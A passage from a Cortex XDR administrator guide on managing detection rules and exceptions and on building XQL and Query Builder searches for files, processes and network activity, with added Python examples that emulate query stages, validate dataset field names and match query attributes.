STEP 3 | Right-click any of the rows, and select Export selected.
The exported file is not editable; however, you can use it as a source to import rules at a later date.

Copy a Rule
You can use an existing rule as a template to create a new one. Global BIOC rules cannot be deleted or
altered, but you can copy a global rule and edit the copy. See Manage Global BIOC Rules.

STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Locate the rule you want to copy.

STEP 3 | Right-click anywhere in the rule row and then select Copy to create a duplicate rule.

Disable or Remove a Rule


If you no longer need a rule you can temporarily disable or permanently remove it.

You cannot delete global BIOCs delivered with content updates.

STEP 1 | Select RULES and the type of rule (BIOC or IOC).

STEP 2 | Locate the rule that you want to change.

STEP 3 | Right-click anywhere in the rule row and then select Remove to permanently delete the rule, or
Disable to temporarily stop it. If you disable a rule, you can later return to the rules page to
Enable it.

Add a Rule Exception


If you want to create a rule to take action on specific behaviors but also want to exclude one or more
indicators from the rule, you can create a rule exception. An indicator can include the SHA256 hash of a
process, process name, process path, vendor name, user name, causality group owner (CGO) full path, or
process command-line arguments. For more information about these indicators, see Cortex XDR Indicators.
For each exception, you also specify the rule scope to which the exception applies.

Cortex XDR only supports exceptions with one attribute. See Add an Alert Exclusion Policy to
create advanced exceptions based on your filtered criteria.

STEP 1 | From Cortex XDR, select Rules > Rule Exceptions.

STEP 2 | Select + New Exception.

STEP 3 | Configure the indicators and conditions for which you want to set the exception.

STEP 4 | Choose the scope of the exception, whether the exception applies to IOCs, BIOCs, or both.

STEP 5 | Save the exception.


By default, activity matching the indicators does not trigger any rule. As an alternative, you can select
one or more rules. After you save the exception, the Exceptions count for the rule increments. If you
later edit the rule, you will also see the exception defined in the rule summary.

Export a Rule Exception


You can choose to export a BIOC rule exception.

STEP 1 | From Cortex XDR, select Rules > Rule Exceptions.

STEP 2 | In the Exceptions table, locate the exception rule you want to export. You can select multiple
rules.

STEP 3 | Right-click and select Export.


If one or more of the selected exceptions are applied to a specific BIOC rule, select one of the following
options:
• Export anyway
• Export only non-specific Exceptions—Only export exceptions applied on all BIOC rules.
• Export all Exceptions as non-specific—Export and apply specific Exceptions to BIOC rules.

Search Queries
• Cortex XDR Query Builder
• Cortex XDR Query Center
• Cortex XDR Scheduled Queries
• Quick Launcher
• Research a Known Threat

Cortex XDR Query Builder


The Query Builder is a powerful search tool at the heart of Cortex XDR that you can use to investigate any
lead quickly, expose the root cause of an alert, perform damage assessment, and hunt for threats from your
data sources. With Query Builder, you can build complex queries for entities and entity attributes so that
you can surface and identify connections between them. The Query Builder searches the raw data and logs
stored in Cortex Data Lake and Cortex XDR for the entities and attributes you specify and returns up to
100,000 results.
From the Query Builder, you can also use the XQL Search to create XQL queries to search for and view raw
data that is stored in Cortex XDR or imported from custom and third-party datasets.

The Query Builder provides queries for the following types of entities:
• Process—Search on process execution and injection by process name, hash, path, command-line
arguments, and more. See Create a Process Query.
• File—Search on file creation and modification activity by file name and path. See Create a File Query.
• Network—Search network activity by IP address, port, host name, protocol, and more. See Create a
Network Query.
• Registry—Search on registry creation and modification activity by key, key value, path, and data. See
Create a Registry Query.
• Event Log—Search Windows event logs by username, log event ID, log level, and message. See Create an
Event Log Query.
• Network Connections—Search security event logs (firewall logs and raw endpoint data) for network
connections across your network. See Create a Network Connections Query.
• All Actions—Search across all network, registry, file, and process activity by endpoint or process. See
Query Across All Entities.
The Query Builder also provides flexibility for both on-demand query generation and scheduled queries.

XQL Search
The XDR Query Language (XQL) enables you to query data ingested into Cortex XDR for rigorous endpoint
and network event analysis. XQL forms queries in stages. Each stage performs a specific query operation
and is delimited by a pipe (|). Queries require a dataset, or data source, to run against. Unless otherwise
specified, the query will run against the xdr_data dataset, which contains all log information that Cortex
XDR collects. However, you can also configure Cortex XDR to query additional datasets.
You can create a dataset with uppercase characters in its name, but in a query the dataset name is
always written in lowercase.
To streamline your investigations, the XQL search provides the following aids to help you construct and
visualize your queries.

• XQL query—The XQL query field is where you define the parameters of your query. To help you create
an effective XQL query, the search field provides suggestions and definitions as you type.
• Query Results—After you create and run an XQL query, you can view, filter, and visualize your Query
Results.
• XQL Helper—Describes common stage commands and provides examples that you can use to build a
query.
• Query Library—Contains common, predefined queries that you can use or modify to your liking.
• Schema—Contains schema information for every field found in the result set. This information includes
the field name, data type, descriptive text (if available), and the dataset that contains the field. In order
for a field to appear in the Schema tab, it must contain a non-NULL value at least once in the result set.
For further help constructing queries, use the Cortex XDR XQL Language Reference.
Create an XQL Query
Use XQL Search to analyze raw log data stored in Cortex XDR. The following example demonstrates how
to create a query that uses the coalesce function to derive a single username by examining multiple field
names.
The XQL Language Reference provides more information about valid commands, such as the ones used in
this example, and general XQL syntax.

STEP 1 | From Cortex XDR, select Investigation > Query Builder > XQL Search.

STEP 2 | (Optional) Specify a dataset.


You only need to specify a dataset if you are running your query against a dataset that you have not set
as default. For more information, see how to manage datasets. See the XQL Language Reference for a
list of the datasets that are available to you, depending on your configuration.
From the first letter that you type, the query field provides you with suggestions of commands and their
definitions:

When you select a command, you will see available operators:

After selecting the operator, the query field presents available values:

STEP 3 | Hit the return key and enter a pipe (|) followed by the first stage of your query.

This stage uses the fields command to declare which fields are returned in the results. If you use this
stage, then following stages can only operate on the fields specified in it.

STEP 4 | Continue adding stages until your query is complete.

This stage uses the function coalesce to return the first value that is not NULL out of the given fields
and the alter stage command to assign that value to the field username.

STEP 5 | Specify the time period against which you want to run your query.
The options are last 24H (hours), last 7D (days), last 1M (month), or select a Custom time period.

STEP 6 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Add as BIOC to save the
query as a BIOC rule (if compatible), Run in background (that is, as resources are available), or Run the
query immediately.

STEP 7 | After running your query, review the Query Results.

Alternate between the following display options to investigate your query results:
• Table—Displays results in rows and columns according to the entity fields.

From the menu, you can change the table layout. You can also change the raw log format
(displayed in the _Raw_Log field) to one of the following log formats:
• RAW—Raw format of the entity in the database.
• JSON—Condensed JSON format with key value distinctions. Null values are not displayed.
• TREE—Dynamic view of the JSON hierarchy with the option to collapse and expand the different
hierarchies.
• Graph—Use the Chart Editor to visualize the query results.
• Advanced—Displays results in a table format aggregating the entity fields into one column.

Similar to the table display, you can change the layout and log format from the menu.
Select Show more to pivot to an Expanded View of the event results that includes null values. You can
toggle between the JSON and Tree views, search, and Copy to clipboard.
For Table and Advanced displays, Cortex XDR provides a Fields menu on the left side of the query
results that you use to filter the results. To quickly set a filter, Cortex XDR displays the top 10 results
from which you can choose to build your filter. From within the Fields menu, click on any field (excluding
JSON and array fields) to see a histogram of all the values found in the result set for that field. This
histogram includes a count of the total number of times a value was found in the result set, the value's
frequency as a percentage of the total number of values found for the field, and a bar chart showing the
value's frequency. In order for Cortex XDR to provide a histogram for a field, the field must not contain
an array or a JSON object.

You can also manage your queries, which includes viewing query results, from the Query Center.

STEP 8 | If desired, continue investigation in the Causality View or Timeline View.


Right-click the event and select the desired view. This option is available for the following types of
events: process (except for those with an event sub type of termination), network, file, registry, injection,
load image, system calls, and Windows event logs. For network stories, you can pivot to the Causality
View only.

STEP 9 | (Optional) Visualize your query results.
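The procedure above builds its query stage by stage: fields narrows the record to the listed fields, alter adds a username computed with coalesce, and limit caps the result. The added example below is Python that mimics those stage semantics on constructed events so you can see exactly what each stage leaves behind; it is not XQL and not Cortex XDR code, and the user_field_* names are placeholders rather than real xdr_data fields. It also shows the ordering mistake the note in STEP 3 warns about: an alter that refers to a field an earlier fields stage already dropped.

```python
"""Stage-by-stage evaluator for the XQL pattern described above:
`fields ... | alter username = coalesce(...) | limit N`, run on constructed
events. Added example: it is Python that mimics the stage semantics, not XQL,
and the user_field_* names are placeholders rather than xdr_data fields.
"""
from typing import Any, Callable, Dict, List, Optional, Sequence

Record = Dict[str, Any]
Stage = Callable[[List[Record]], List[Record]]


def stage_fields(records: List[Record], names: Sequence[str]) -> List[Record]:
    """`fields a, b, c`: project each record onto the listed fields.
    Fields not listed are gone for every later stage."""
    return [{n: r.get(n) for n in names} for r in records]


def coalesce(*values: Any) -> Optional[Any]:
    """`coalesce(x, y, z)`: first argument that is not NULL (None).
    A falsy value such as 0 or "" is still a value, not NULL."""
    for v in values:
        if v is not None:
            return v
    return None


def stage_alter(records: List[Record], target: str,
                func: Callable[..., Any], sources: Sequence[str]) -> List[Record]:
    """`alter target = func(sources...)`: compute one new field per record.
    A source field dropped by an earlier `fields` stage is an error rather
    than a silent NULL, so the mistake surfaces immediately."""
    out = []
    for r in records:
        missing = [f for f in sources if f not in r]
        if missing:
            raise KeyError(f"not available after an earlier fields stage: {missing}")
        new = dict(r)
        new[target] = func(*(r[f] for f in sources))
        out.append(new)
    return out


def stage_limit(records: List[Record], n: int) -> List[Record]:
    """`limit N`: keep the first N records."""
    return records[:n]


def run_pipeline(dataset: Sequence[Record], stages: Sequence[Stage]) -> List[Record]:
    """Feed the dataset through the stages in order, like the pipes in XQL."""
    records = list(dataset)
    for stage in stages:
        records = stage(records)
    return records


# Constructed events; user_field_* are placeholder names, not the real schema.
SAMPLE_EVENTS: List[Record] = [
    {"_time": "2020-11-02T10:00:00Z", "user_field_1": None, "user_field_2": "alice",
     "user_field_3": None, "extra": "dropped by fields"},
    {"_time": "2020-11-02T10:01:00Z", "user_field_1": "bob", "user_field_2": "svc",
     "user_field_3": None},
    {"_time": "2020-11-02T10:02:00Z", "user_field_1": None, "user_field_2": None,
     "user_field_3": None},
    {"_time": "2020-11-02T10:03:00Z", "user_field_1": None, "user_field_2": None,
     "user_field_3": "carol"},
]
USER_FIELDS = ["user_field_1", "user_field_2", "user_field_3"]


def derive_usernames(events: Sequence[Record], limit: int = 10) -> List[Record]:
    """dataset | fields _time, user_field_1, user_field_2, user_field_3
               | alter username = coalesce(user_field_1, user_field_2, user_field_3)
               | limit <limit>"""
    return run_pipeline(events, [
        lambda r: stage_fields(r, ["_time", *USER_FIELDS]),
        lambda r: stage_alter(r, "username", coalesce, USER_FIELDS),
        lambda r: stage_limit(r, limit),
    ])


def alter_after_narrow_fields_fails(events: Sequence[Record]) -> bool:
    """True if `fields _time | alter username = coalesce(...)` is rejected,
    which is the ordering mistake the guide warns about."""
    try:
        run_pipeline(events, [
            lambda r: stage_fields(r, ["_time"]),
            lambda r: stage_alter(r, "username", coalesce, USER_FIELDS),
        ])
    except KeyError:
        return True
    return False


if __name__ == "__main__":
    for row in derive_usernames(SAMPLE_EVENTS, limit=3):
        print(row["_time"], row["username"])
```

The third event keeps a NULL username because every candidate field is NULL; when you see that in real results, add the next fallback field to the coalesce list (and to the fields stage that precedes it).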

Manage Datasets
Cortex XDR runs every XQL query against a dataset. A dataset is a CSV or JSON file that contains the data
you are interested in querying. If you do not specify a dataset in your query, then Cortex XDR runs the
query against the xdr_data dataset, which contains all of the endpoint and network data that Cortex XDR
collects.
To query other datasets, you have two options: you can either set the dataset as default, which enables
you to query the datasets without specifying them in the query, or you can name a specific dataset at the
beginning of your query with the dataset stage command. You can add to your list of available datasets by
uploading a CSV or JSON file to Cortex XDR.

You cannot upload a file that contains a byte array (that is, binary data).

Manage datasets from Cortex XDR > Settings > Dataset Management. There, you can import, view, and
interact with your available datasets.
In addition to the names of your datasets, you can view their Type and whether or not they are the Default
Query Target. Cortex XDR determines Type by the method used to upload the dataset. If uploaded through
the user interface, the Type is Lookup. If saved by a query using the target command, the Type can be
either User or Lookup. See the entry for target in the XQL Language Reference for details.

• Import a dataset.
1. Select + Lookup.

2. Browse to your CSV or JSON file, or drag and drop it into the dialog window.

When uploading a JSON file, ensure that each field name meets the following
requirements:
• Only use letters (a-z, A-Z), numbers (0-9), or underscores (_).
• Must start with a letter or underscore. Cannot use the prefixes TABLE, FILE, or
_PARTITION.
• Cannot exceed 128 characters.
• No duplicate names, white spaces, or carriage returns.
You can create dataset names using uppercase characters, but in queries dataset
names are always treated as if they are lowercase.
3. (Optional) Rename the file.
4. Add the file as a lookup.

5. After receiving a notification reporting that the upload succeeded, Refresh to view it in your list
of datasets.
If the file has the same name as an existing dataset, Cortex XDR will append an underscore and a
number to the name to make it unique.

• Save query results as a dataset.


You can use the target stage command to save query results as a dataset. For details about this
command, see the XQL Language Reference.

• Query against a dataset by selecting it with the dataset command when you create an XQL
query.

• Right-click on a dataset to delete it, copy it, set it as default, and show or hide datasets.

• Set as default to query the dataset without having to specify it in your queries.
• Delete to remove the dataset from Cortex XDR.
• Copy text to clipboard to copy the name of the dataset to your clipboard.
• Copy entire row to copy each cell in a row, separated by tabs, to your clipboard.
• Show rows with ‘<dataset_name>’ to create a filter that displays all datasets with the same name.
• Hide rows with ‘<dataset_name>’ to create a filter that hides all datasets with the same name.

• Filter your available datasets to specify the ones you want to see.
1. Select Filter.
An interface for your filter criteria appears.

2. Select a field, an operator, and a value to match.

3. Select + AND or + OR to add additional filter expressions.

4. Save your filter to reuse it later.

After saving, select the three-dot menu to view your filter.

• Customize the table.

Select the three-dot menu and Layout to change the width of rows and columns. You can also select
which columns to display.
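A JSON lookup that violates the field-name rules listed under "Import a dataset" fails only after the upload, so it is worth checking the file locally first. The following added example (not Cortex XDR code) applies those rules to every key in a JSON file. Two details are assumptions, not statements from the guide: the forbidden prefixes are compared case-insensitively, which is the conservative reading of the uppercase forms the guide lists, and nested object keys are held to the same rules as top-level ones. The duplicate-name check needs an object_pairs_hook because json.loads() silently keeps only the last of two duplicate keys.

```python
"""Pre-upload check for the JSON dataset field-name rules listed under
"Import a dataset". Added example, not Cortex XDR code; it validates a file
locally before you upload it so that a rejected field name is caught early.
Assumptions: the forbidden prefixes are compared case-insensitively
(conservative; the guide lists the uppercase forms), and nested object keys
are checked with the same rules as top-level ones.
"""
import json
import re
from typing import Dict, List

NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
FORBIDDEN_PREFIXES = ("TABLE", "FILE", "_PARTITION")
MAX_NAME_LEN = 128


def field_name_problems(name: str) -> List[str]:
    """Return every rule a single field name violates (empty list = OK)."""
    problems = []
    if len(name) > MAX_NAME_LEN:
        problems.append(f"longer than {MAX_NAME_LEN} characters")
    if re.search(r"\s", name):
        problems.append("contains white space or a carriage return")
    elif not NAME_RE.match(name):
        problems.append("must use only letters, digits and underscores and "
                        "start with a letter or underscore")
    if name.upper().startswith(FORBIDDEN_PREFIXES):
        problems.append("uses a forbidden prefix (TABLE, FILE, _PARTITION)")
    return problems


def validate_json_dataset(text: str) -> Dict[str, List[str]]:
    """Parse a JSON dataset and map each offending field name to its problems.

    json.loads() normally keeps only the last of two duplicate keys, so an
    object_pairs_hook is used to see duplicates before they are collapsed.
    """
    duplicates = set()
    names = set()

    def hook(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                duplicates.add(key)
            seen.add(key)
            names.add(key)
        return dict(pairs)

    json.loads(text, object_pairs_hook=hook)
    report = {n: field_name_problems(n) for n in sorted(names)}
    for d in duplicates:
        report[d].append("duplicate field name within one object")
    return {n: p for n, p in report.items() if p}


# Constructed sample exercising each rule once; not a real dataset.
SAMPLE_JSON = """[
  {"host_name": "ws-01", "FILE_hash": "abc", "host_name": "ws-01-dup"},
  {"bad name": 1, "_PARTITION_id": 2, "9lives": 3, "ok_field": 4}
]"""

if __name__ == "__main__":
    for name, problems in validate_json_dataset(SAMPLE_JSON).items():
        print(f"{name!r}: {'; '.join(problems)}")
```

An empty dictionary from validate_json_dataset() means the field names pass every listed rule; the file may still be rejected for other reasons, such as containing binary data, which this check does not cover.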

Visualize Query Results


To help you better understand your XQL query results and share your insights with others, Cortex XDR
enables you to generate visualizations of your query data directly from the XQL Search page.

STEP 1 | Navigate to Cortex XDR > Query Builder > XQL Search.

STEP 2 | Run an XQL query.


For example, enter dataset = xdr_data | fields action_total_upload, _time | limit 10. The query
returns action_total_upload, a number field, and _time, a string field, for up to 10 results.

STEP 3 | In the Query Results section, to visualize the results either:


1. Navigate to Query Results > Chart Editor to manually build and view the graph using the
selected visualization parameters:

• Main
• Graph Type—Type of visualization; Area, Bubble, Column, Gauge, Line, Pie, Scatter, or Single
Value.
• Subtype and Layout—Depending on the selected type of graph, choose from the available
display options.
• Header—Title your graph.

• Show Callouts—Display numeric values on graph.
• Data
• X-axis—Select a field with a string value.
• Y-axis—Select a field with a numeric value.
• Depending on the selected type of graph, customize the Color, Font, and Legend.
2. Enter the visualization parameters in the XQL query section.
You can express any chart preferences in XQL. This is helpful when you want to save your chart
preferences in a query and generate a chart every time that you run it. To define the parameters,
either:
• Manually enter the parameters, for example, view graph type = column subtype = grouped
header = "Test 1" xaxis = _time yaxis = _product,action_total_upload.
• Select ADD TO QUERY to insert your chart preferences into the query itself.

STEP 4 | (Optional) Create a custom widget.


To easily track your query results, you can create custom widgets based on the query results in the
Widget Library. The custom widgets you create can be used in your custom dashboards and reports.
Select Save to Widget Library to pivot to the Widget Library and generate a custom widget based on the
query results.

Create a File Query


From the Query Builder you can investigate connections between file activity and endpoints. The Query
Builder searches your logs and endpoint data for the file activity that you specify. To Search for Files on
Endpoints instead of file-related activity, use the Native Search.

Some examples of file queries you can run include:
• Files modified on specific endpoints.
• Files related to process activity that exist on specific endpoints.
To build a file query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select FILE.

STEP 3 | Enter the search criteria for the file events query.
• File activity—Select the type or types of file activity you want to search: All, Create, Read, Rename,
Delete, or Write.
• File attributes—Define any additional file attributes for which you want to search. Use a pipe (|)
to separate multiple values (for example notepad.exe|chrome.exe). By default, Cortex XDR returns
the events that match the attribute you specify. To exclude an attribute value, toggle the operator
from = to !=. Attributes are:
• NAME—File name.
• PATH—Path of the file.
• PREVIOUS NAME—Previous name of a file.
• PREVIOUS PATH—Previous path of the file.
• MD5—MD5 hash value of the file.
• SHA256—SHA256 hash value of the file.
• DEVICE TYPE—Type of device used to run the file: Unknown, Fixed, Removable Media, CD-ROM.
• DEVICE SERIAL NUMBER—Serial number of the device type used to run the file.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.

Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash.
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:


• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create a Process Query


From the Query Builder you can investigate connections between processes, child processes, and
endpoints.

For example, you can create a process query to search for processes executed on a specific endpoint.
To build a process query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select PROCESS.

STEP 3 | Enter the search criteria for the process query.


• Process action—Select the type of process action you want to search: On process Execution or
Injection into another process.
• Process attributes—Define any additional process attributes for which you want to search.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
By default, Cortex XDR will return results that match the attribute you specify. To exclude an
attribute value, toggle the operator from = to !=. Attributes are:
• NAME—Name of the process. For example, notepad.exe.
• PATH—Path to the process. For example, C:\windows\system32\notepad.exe.
• CMD—Command-line used to initiate the process including any arguments, up to 128 characters.
• MD5—MD5 hash value of the process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the process: Signature Unavailable, Signed, Invalid Signature,
Unsigned, Revoked, Signature Fail.
• SIGNER—Signer of the process.
• PID—Process ID.
• DEVICE TYPE—Type of device used to run the process: Unknown, Fixed, Removable Media, CD-ROM.
• DEVICE SERIAL NUMBER—Serial number of the device type used to run the process.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash.
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:


• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.

Create a Network Query


From the Query Builder you can investigate connections between network activity, acting processes, and
endpoints.

Some examples of network queries you can run include:
• Network connections to or from a specific IP address and port number.
• Processes that created network connections.
• Network connections between specific endpoints.
To build a network query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select NETWORK.

STEP 3 | Enter the search criteria for the network events query.
• Network traffic type—Select the type or types of network traffic you want to search: Incoming,
Outgoing, or Failed.
• Network attributes—Define any additional network attributes for which you want to search. Use a
pipe (|) to separate multiple values (for example 80|8080). By default, Cortex XDR returns the
events that match the attribute you specify. To exclude an attribute value, toggle the operator
from = to !=. Options are:
• REMOTE COUNTRY—Country from which the remote IP address originated.
• REMOTE IP—Remote IP address related to the communication.
• REMOTE PORT—Remote port used to make the connection.
• LOCAL IP—Local IP address related to the communication. Matches can return additional data if a
machine has more than one NIC.
• LOCAL PORT—Local port used to make the connection.
• PROTOCOL—Network transport protocol over which the traffic was sent.
To specify an additional exception (match this value except), click the + to the right of the value and
specify the exception value.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.

Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash.
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.
• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

STEP 5 | (Optional) Limit the scope to an endpoint or endpoint attributes:

Select and specify one or more of the following attributes:


• HOST—HOST NAME, HOST IP address, HOST OS, HOST MAC ADDRESS, or INSTALLATION TYPE.
INSTALLATION TYPE can be either Cortex XDR agent or Data Collector.
• PROCESS—NAME, PATH, CMD, MD5, SHA256, USER NAME, SIGNATURE, or PID
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.

STEP 6 | Specify the time period for which you want to search for events.
Options are: Last 24H (hours), Last 7D (days), Last 1M (month), or select a Custom time period.

STEP 7 | Choose when to run the query.

Select the calendar icon to schedule a query to run on or before a specific date, Run in background to
run the query as resources are available, or Run to run the query immediately and view the results in the
Query Center.

STEP 8 | When you are ready, View the Results of a Query.
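The File, Process and Network query forms above share one matching vocabulary: a pipe separates alternative values, an asterisk matches any run of characters, the operator toggles between = and !=, and the + control adds an exception value that a positive match must not equal. The added example below (Python, not Cortex XDR code) implements that vocabulary and runs two queries over constructed file events, so you can check what a given combination of criteria would and would not return before you build it in the Query Builder. Assumptions: the event field names (action, name, path, actor_name) are placeholders, matching is case-insensitive as Windows file and process names are, and an event without the attribute satisfies only != filters.

```python
"""Attribute matching as the File, Process and Network query forms above
describe it: '|' separates alternatives, '*' matches any run of characters,
the operator toggles between = and !=, and '+' adds an exception value that
a positive match must not equal. Added example in Python, not Cortex XDR
code; the event field names are placeholders, matching is case-insensitive,
and the treatment of a missing attribute (it satisfies only != filters) is an
assumption.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence

Event = Dict[str, str]


def pattern_to_regex(pattern: str) -> "re.Pattern[str]":
    """'a|b*' -> anchored, case-insensitive regex matching a or b*."""
    alternatives = [re.escape(p.strip()).replace(r"\*", ".*")
                    for p in pattern.split("|") if p.strip()]
    return re.compile("^(?:" + "|".join(alternatives) + ")$", re.IGNORECASE)


@dataclass
class AttributeFilter:
    field: str
    value: str                           # e.g. "notepad.exe|chrome.exe"
    negate: bool = False                 # False: "=", True: "!="
    except_value: Optional[str] = None   # the "+" exception, e.g. "notepad.exe"

    def matches(self, event: Event) -> bool:
        actual = event.get(self.field)
        if actual is None:
            return self.negate           # assumption: absent attribute only passes "!="
        hit = bool(pattern_to_regex(self.value).match(actual))
        if hit and self.except_value and pattern_to_regex(self.except_value).match(actual):
            hit = False                  # "match this value except ..."
        return not hit if self.negate else hit


def run_query(events: Sequence[Event], filters: Sequence[AttributeFilter]) -> List[Event]:
    """Every filter must hold: the form ANDs the criteria you fill in."""
    return [e for e in events if all(f.matches(e) for f in filters)]


# Constructed file events with placeholder field names.
SAMPLE_EVENTS: List[Event] = [
    {"action": "Write", "name": "invoice.docm",
     "path": r"C:\Users\alice\Downloads\invoice.docm", "actor_name": "chrome.exe"},
    {"action": "Create", "name": "update.exe",
     "path": r"C:\Users\alice\AppData\Local\Temp\update.exe", "actor_name": "WINWORD.EXE"},
    {"action": "Write", "name": "notes.txt",
     "path": r"C:\Users\bob\Documents\notes.txt", "actor_name": "notepad.exe"},
    {"action": "Delete", "name": "cache.bin",
     "path": r"C:\Program Files\App\cache.bin", "actor_name": "app.exe"},
]


def files_touched_under_user_profiles() -> List[str]:
    """File activity = Create|Write, PATH = C:\\Users\\*, acting process NAME =
    chrome.exe|winword.exe|notepad.exe with notepad.exe as the '+' exception."""
    filters = [
        AttributeFilter("action", "Create|Write"),
        AttributeFilter("path", r"C:\Users\*"),
        AttributeFilter("actor_name", "chrome.exe|winword.exe|notepad.exe",
                        except_value="notepad.exe"),
    ]
    return [e["name"] for e in run_query(SAMPLE_EVENTS, filters)]


def files_not_touched_by_chrome() -> List[str]:
    """Same data with the operator toggled: acting process NAME != chrome.exe."""
    return [e["name"] for e in
            run_query(SAMPLE_EVENTS, [AttributeFilter("actor_name", "chrome.exe", negate=True)])]


if __name__ == "__main__":
    print(files_touched_under_user_profiles())
    print(files_not_touched_by_chrome())
```

The exception value is applied only after a positive match, which is why notes.txt drops out of the first query even though notepad.exe is listed among the acting processes; that mirrors the "match this value except" wording of the form.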

Create an Image Load Query


From the Query Builder you can investigate connections between image load activity, acting processes, and
endpoints.

Some examples of image load queries you can run include:
• Module load into process events by module path or hash.
To build an image load query:

STEP 1 | From Cortex XDR, select INVESTIGATION > Query Builder.

STEP 2 | Select IMAGE LOAD.

STEP 3 | Enter the search criteria for the image load activity query.
• Type of image activity: All, Image Load, or Change Page Protection.
• Identifying information about the image module: Full Module Path, Module MD5, or Module
SHA256.
By default, Cortex XDR will return the activity that matches all the criteria you specify. To exclude a
value, toggle the = option to =!.

STEP 4 | (Optional) Limit the scope to a specific acting process:

Select and specify one or more of the following attributes for the acting (parent) process.
Use a pipe (|) to separate multiple values. Use an asterisk (*) to match any string of characters.
• NAME—Name of the parent process.
• PATH—Path to the parent process.
• CMD—Command-line used to initiate the parent process including any arguments, up to 128
characters.
• MD5—MD5 hash value of the parent process.
• SHA256—SHA256 hash value of the process.
• USER NAME—User who executed the process.
• SIGNATURE—Signing status of the parent process: Signed, Unsigned, N/A, Invalid Signature, Weak
Hash
• SIGNER—Entity that signed the certificate of the parent process.
• PID—Process ID of the parent process.

• Run search on process, Causality and OS actors—The causality actor—also referred to as the
causality group owner (CGO)—is the parent process in the execution chain that the Cortex XDR agent
identified as being responsible for initiating the process tree. The OS actor is the parent process that
creates an OS process on behalf of a different initiator. By default, this option is enabled to apply
the same search criteria to initiating processes. To configure different attributes for the parent or
initiating process, clear this option.

